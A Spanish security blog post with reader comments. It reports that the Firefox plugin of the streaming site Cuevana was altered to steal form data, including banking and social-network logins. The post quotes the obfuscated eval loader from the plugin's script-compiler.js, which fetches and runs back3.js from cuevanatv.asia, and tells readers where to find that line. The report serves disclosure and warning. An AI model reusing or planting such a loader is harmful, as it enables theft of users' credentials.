16 sept 2012

¿El plug-in de #Cuevana roba(ba) información financiera? (Actualizado)

Actualización: es probable que el script del plugin haya sido modificado por un tercero, ajeno a Cuevana. Lee el post hasta el final.

Cuevana, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de "phising" (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, este pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin "Cuevana Streaming". Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo "script-compiler.js" que encontrarás en la carpeta "content". Una vez abierto ese archivo observa la linea número 232.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))


Actualización 19:00: confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

Actualización 19.30: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).

Entrar en la carpeta "content" y mirar la linea 232 del archivo "script-compiler.js". La url maliciosa es hxxp://cuevanatv.asia/back3.js.

Actualización 19.50:  han cambiado al código fuente del plugin. El plugin original para analizarlo se encuentra aquí.

Actualización 19.57: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

Actualización 21:00: he analizado el código fuente de la versión 4.2 instalado en mi propia computadora hace tiempo (más de un mes) y la misma versión 4.2 modificada y efectivamente se observa la diferencia en el código fuente. A continuación dejo los dos fuentes:

Versión instalada hace un mes
Versión modificada
En Windows Vista o superior, el plugin lo puedes encontrar en: C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\\

La diferencia en el código podría indicar que:
El tiempo dirá.

Actualización 21:50: Cuevana está investigando el tema y recomienda desinstalar el plugin, e instalarlo nuevamente. Además se deben cambiar todas las contraseñas.

Fuente: Foro Coches y Galacticow

Suscríbete a nuestro Boletín

17 comentarios:

  1. He quedado algo confundido, cuando dices en el nuevo plugin te refieres a que lo han cambiado luego de este post? O es que este post no es reciente?

    ResponderBorrar
  2. n3x07, en pocos minutos han cambiado el JS del plugin luego de que la noticia se hiciera pública.

    Cristian

    ResponderBorrar
  3. Hola, tengo la version 4.1 del plugin de Cuevana con la ultima actualizacion el 11 de Marzo de 2012.

    Lo subi a MediFire para que lo veas:
    http://www.mediafire.com/?flhlevc9s4mcdvl

    Bajatelo y subilo en forma permanente en algun lado como prueba para que la gente sepa. El plugin malicioso tambien.

    ResponderBorrar
  4. Augus1990,

    En mi version 4.2 no encontré el script (mira mi ultima actualización del post) y en el tuyo 4.1 tampoco. Vos lo encontraste ?

    Cristian

    ResponderBorrar
  5. Tengo 4.1, no revise el código, pero si analice con Tamper Data y no hace ningún request extraño, por lo cual me sueana mas a que alguién había modificado el script aprovechando alguna vulnerabilidad, no creo que cuevana tenga que ver con esto.
    Además, si hubiera intenciones de cuevana en robar esa información, o hubieran hecho el request contra cuevana.tv, o lo hubieran hecho contra un dominio muchisimo mas encubierto. Que sea contra cuevanatv.asia es el tipico caso de "quiero que piensen que tiene que ver con cuevana, pero no soy dueño del verdadero dominio".

    ResponderBorrar
  6. ¿Para Chrome, puede ser que la versión sea 4.3? Esa es la que tengo.

    ResponderBorrar
  7. Analicé el plugin en Firefox (4.1), y efectivamente se encuentra el código eval en el archivo script-compiler.js. Según la fecha de este archivo, el plugin lo tengo instalado DESDE el 17 de MARZO de 2012. Que verguenza... ahora el dueño quiere arreglar las cosas con un simple "lamentablemente sufrimos una brecha de seguridad"

    ResponderBorrar
  8. ¿El plugin en Google Chrome también esta infectado?

    ResponderBorrar
  9. Y qué hay del plugin de MonsterDIVX que tiene pinta de ser muy parecido al de CuenvaTV?:

    * http://www.monsterdivx.com

    ResponderBorrar
  10. ¿Por qué no me creo a Cuevana?
    plus.google.com/u/0/115097102443606912574/posts/giqzCizKCym

    ResponderBorrar
  11. Actualizá el post no es así, se vió afectado el plugin de Firefox nada más. Cuevana sigue siendo el mejor sitio para ver en stream series y películas.
    http://www.cuevana.tv/#!/noticias/1703/comunicado-importante

    ResponderBorrar
  12. Joaquin, si fuera el mejor tendría mas precaución sobre la seguridad de sus usuarios.

    Cristian

    ResponderBorrar
  13. Carajo que hasheen sus plugins esos cojudos !

    ResponderBorrar
  14. @Segu-Info La version 4.1 que tenia yo la probe con el Tamper Data y no envia datos a un servidor raro. Por las dudas hice ese backup del plugin y te lo subi a internet para que lo revices si queres.

    Saludos.

    ResponderBorrar
  15. Augus1990, como te decia en un comentario anterior, la 4.1 no tenia nada. La 4.2 q está en este momento en Cuevana, tampoco.

    Cristian

    ResponderBorrar
  16. como se que plugin tengo instalado?

    gracias

    ResponderBorrar
  17. El tema está solucionado, cuevana sigue siendo la solucion ideal para ver peliculas via streaming sin esperar ni bajar ni pagar :S

    ResponderBorrar

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!